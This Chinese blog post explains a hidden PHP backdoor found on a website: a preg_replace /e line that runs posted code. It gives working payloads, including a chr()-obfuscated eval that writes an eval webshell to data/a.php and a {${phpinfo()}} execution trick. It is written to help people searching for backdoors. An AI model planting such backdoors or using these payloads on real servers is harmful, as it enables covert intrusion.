事情是這樣的，朋友的網(wǎng)站的利用各種查找后門的工具都沒有發(fā)現(xiàn)php木馬。老是找不到，小黑的伎倆很高級，每次使用完畢總是把后門刪掉，但是每次都能繼續(xù)進(jìn)來，總是找不到從哪進(jìn)來的。這個著實(shí)讓人蛋疼。

后來，終于在日志中發(fā)現(xiàn)一絲蛛絲馬跡，通過我的分析，我發(fā)現(xiàn)一個IP總是很奇怪的POST數(shù)據(jù)到某個文件。然后一段時間后，此IP就訪問一個莫名奇妙文件，名字很顯眼明顯不是正常系統(tǒng)文件，而是PHP后門。但是很快使用完畢后門就被刪除了。

哈哈，遇到小黑蠻細(xì)心的。

然后通過分析發(fā)現(xiàn)，小黑的訪問的文件發(fā)現(xiàn)代碼：

@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);

如果你看到這個代碼是不是有的也沒什么問題，但是，這個就是小黑的掩藏的惡意代碼和后門。隱蔽吧，基本上任何查殺軟件都查殺不到。

preg_replace函數(shù)原型：

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說明：

/e 修正符使 preg_replace() 將 replacement 參數(shù)當(dāng)作 PHP 代碼(在適當(dāng)?shù)哪嫦蛞锰鎿Q完之后)。提示：要確保 replacement 構(gòu)成一個合法的 PHP 代碼字符串，否則 PHP 會在報告在包含 preg_replace() 的行中出現(xiàn)語法解析錯誤。

上面的代碼是POST接受數(shù)據(jù)要測試，比較麻煩，如果換成GET獲取數(shù)據(jù)的話。。。

舉例：

echo preg_replace(“/test/e”,$_GET["h"],”jutst test”);

如果我們提交?h=phpinfo()，phpinfo()將會被執(zhí)行(使用/e修飾符，preg_replace會將 replacement 參數(shù)當(dāng)作 PHP 代碼執(zhí)行)。

如果我們要POST的話，我們測試提交下面的代碼會怎么樣呢?

h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

密文對應(yīng)的明文是：

fputs(fopen(data/a.php,w),);

執(zhí)行的結(jié)果是在/data/目錄下生成一個一句話木馬文件 a.php。

這個就恐怖了吧。。。。

再來一個有難度的例子：

提交 ?h=phpinfo() ，phpinfo()會被執(zhí)行嗎?

肯定不會。因?yàn)榻?jīng)過正則匹配后， replacement 參數(shù)變?yōu)?rsquo;test(“phpinfo”)’，此時phpinfo僅是被當(dāng)做一個字符串參數(shù)了。

有沒有辦法讓它執(zhí)行呢?

當(dāng)然有。在這里我們?nèi)绻峤?h={${phpinfo()}}，phpinfo()就會被執(zhí)行。為什么呢?

在php中，雙引號里面如果包含有變量，php解釋器會將其替換為變量解釋后的結(jié)果;單引號中的變量不會被處理。

注意：雙引號中的函數(shù)不會被執(zhí)行和替換。

在這里我們需要通過{${}}構(gòu)造出了一個特殊的變量，’test(“{${phpinfo()}}”)’，達(dá)到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會被解釋執(zhí)行)。

可以先做如下測試：

echo “{${phpinfo()}}”; phpinfo會被成功執(zhí)行了。

所以，各位查找后門的時候注意查找下。

OK，說了那么多，也了解了，以上我給的代碼：

@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);

看似很正常的代碼，其實(shí)就是一個極度危險的代碼，隱藏頗深啊。哈哈。希望對大家有幫助

作者：合肥制造

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。